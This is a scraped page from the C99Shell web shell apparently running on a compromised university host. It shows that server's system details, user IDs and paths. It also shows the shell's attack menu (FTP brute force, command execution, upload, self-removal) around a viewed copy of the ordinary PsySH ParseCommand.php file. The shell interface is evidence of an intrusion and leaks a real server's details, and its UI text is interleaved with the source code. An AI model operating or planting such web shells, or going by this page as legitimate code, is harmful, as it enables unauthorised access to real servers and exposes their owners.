!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/psy/psysh/src/Psy/Command/   drwxr-xr-x
Free 117.42 GB of 200.55 GB (58.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ParseCommand.php (4.48 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Psy Shell.
 *
 * (c) 2012-2015 Justin Hileman
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Psy\Command;

use 
PhpParser\Node;
use 
PhpParser\Parser;
use 
Psy\ParserFactory;
use 
Psy\VarDumper\Presenter;
use 
Psy\VarDumper\PresenterAware;
use 
Symfony\Component\Console\Input\InputArgument;
use 
Symfony\Component\Console\Input\InputInterface;
use 
Symfony\Component\Console\Input\InputOption;
use 
Symfony\Component\Console\Output\OutputInterface;
use 
Symfony\Component\VarDumper\Caster\Caster;

/**
 * Parse PHP code and show the abstract syntax tree.
 */
class ParseCommand extends Command implements PresenterAware
{
    private 
$presenter;
    private 
$parserFactory;
    private 
$parsers;

    
/**
     * {@inheritdoc}
     */
    
public function __construct($name null)
    {
        
$this->parserFactory = new ParserFactory();
        
$this->parsers = array();

        
parent::__construct($name);
    }

    
/**
     * PresenterAware interface.
     *
     * @param Presenter $presenter
     */
    
public function setPresenter(Presenter $presenter)
    {
        
$this->presenter = clone $presenter;
        
$this->presenter->addCasters(array(
            
'PhpParser\Node' => function (Node $node, array $a) {
                
$a = array(
                    
Caster::PREFIX_VIRTUAL 'type'       => $node->getType(),
                    
Caster::PREFIX_VIRTUAL 'attributes' => $node->getAttributes(),
                );

                foreach (
$node->getSubNodeNames() as $name) {
                    
$a[Caster::PREFIX_VIRTUAL $name] = $node->$name;
                }

                return 
$a;
            },
        ));
    }

    
/**
     * {@inheritdoc}
     */
    
protected function configure()
    {
        
$definition = array(
            new 
InputArgument('code'InputArgument::REQUIRED'PHP code to parse.'),
            new 
InputOption('depth'''InputOption::VALUE_REQUIRED'Depth to parse'10),
        );

        if (
$this->parserFactory->hasKindsSupport()) {
            
$msg 'One of PhpParser\\ParserFactory constants: '
                
implode(', 'ParserFactory::getPossibleKinds())
                . 
" (default is based on current interpreter's version)";
            
$defaultKind $this->parserFactory->getDefaultKind();

            
$definition[] = new InputOption('kind'''InputOption::VALUE_REQUIRED$msg$defaultKind);
        }

        
$this
            
->setName('parse')
            ->
setDefinition($definition)
            ->
setDescription('Parse PHP code and show the abstract syntax tree.')
            ->
setHelp(
                <<<'HELP'
Parse PHP code and show the abstract syntax tree.

This command is used in the development of PsySH. Given a string of PHP code,
it pretty-prints the PHP Parser parse tree.

See https://github.com/nikic/PHP-Parser

It prolly won't be super useful for most of you, but it's here if you want to play.
HELP
            );
    }

    
/**
     * {@inheritdoc}
     */
    
protected function execute(InputInterface $inputOutputInterface $output)
    {
        
$code $input->getArgument('code');
        if (
strpos('<?'$code) === false) {
            
$code '<?php ' $code;
        }

        
$parserKind $input->getOption('kind');
        
$depth      $input->getOption('depth');
        
$nodes      $this->parse($this->getParser($parserKind), $code);
        
$output->page($this->presenter->present($nodes$depth));
    }

    
/**
     * Lex and parse a string of code into statements.
     *
     * @param Parser $parser
     * @param string $code
     *
     * @return array Statements
     */
    
private function parse(Parser $parser$code)
    {
        try {
            return 
$parser->parse($code);
        } catch (\
PhpParser\Error $e) {
            if (
strpos($e->getMessage(), 'unexpected EOF') === false) {
                throw 
$e;
            }

            
// If we got an unexpected EOF, let's try it again with a semicolon.
            
return $parser->parse($code ';');
        }
    }

    
/**
     * Get (or create) the Parser instance.
     *
     * @param string|null $kind One of Psy\ParserFactory constants (only for PHP parser 2.0 and above).
     *
     * @return Parser
     */
    
private function getParser($kind null)
    {
        if (!
array_key_exists($kind$this->parsers)) {
            
$this->parsers[$kind] = $this->parserFactory->createParser($kind);
        }

        return 
$this->parsers[$kind];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.023 ]--